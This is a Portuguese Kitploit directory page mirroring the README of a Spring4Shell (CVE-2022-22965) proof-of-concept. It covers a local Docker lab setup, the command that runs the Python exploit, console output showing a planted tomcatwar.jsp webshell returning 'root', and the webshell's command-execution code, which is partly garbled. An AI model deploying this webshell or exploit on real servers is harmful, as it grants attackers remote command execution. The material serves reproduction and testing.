Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Spring4Shell-POC — Reproduz a vulnerabilidade de execução remota de código Spring4Shell (CVE-2022-22965) com um script de exploração em Python, implantando um webshell JSP no Apache Tomcat para teste e verificação. | Kitploit
Ferramentas/GitHubGitHub/weijilab/spring4shell-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações Web
GitHubweijilab/spring4shell-poc

Spring4Shell-POC

Reproduz a vulnerabilidade de execução remota de código Spring4Shell (CVE-2022-22965) com um script de exploração em Python, implantando um webshell JSP no Apache Tomcat para teste e verificação.

Ver Repositório
113108há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Spring4Shell-POC

Processo de reprodução local da vulnerabilidade Spring4Shell

Preparação do ambiente

  • Ambiente docker, docker-compose

  • Empacotar com mvn, gerar ``./target/ROOT.war`````shell mvn package

* Iniciar serviço```shell
docker-compose up -d
  • Parar serviço```shell docker-compose down
## Processo de reprodução

* Executar o script```shell
python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080"
  • Primeira execução

Primeira execução

  • Segunda execução

Segunda execução

  • Processo de execução``` ➜ spring4shell-poc clear
    ➜ spring4shell-poc python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080" The vulnerability exists, the shell address is :http://127.0.0.1:8080/tomcatwar.jsp?pwd=j&cmd=whoami got response: ➜ spring4shell-poc clear ➜ spring4shell-poc python3 spring-4-shell-exp.py --url "http://127.0.0.1:8080" The vulnerability exists, the shell address is :http://127.0.0.1:8080/tomcatwar.jsp?pwd=j&cmd=whoami got response: root

//

  • if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } -

➜ spring4shell-poc

* no contêiner Docker, pode-se ver que um arquivo jsp foi criado no serviço de aplicação Tomcat

![spring-4-shell-web](https://assets.kitploit.com/production/public/readmes/5300/3c171f1bcbfd46534f345a9aee6089e18ced9569afd208bd7eb33cc882246688.png)


* também é possível acessar diretamente pela web

![spring-4-shell-web](https://assets.kitploit.com/production/public/readmes/5300/5205a0cd1c694bfa02964a130c6a05ded1c1d1f3a2ce4d96b85d74ed863b85fd.png)


## Pontos de Atenção
Baixar ferramenta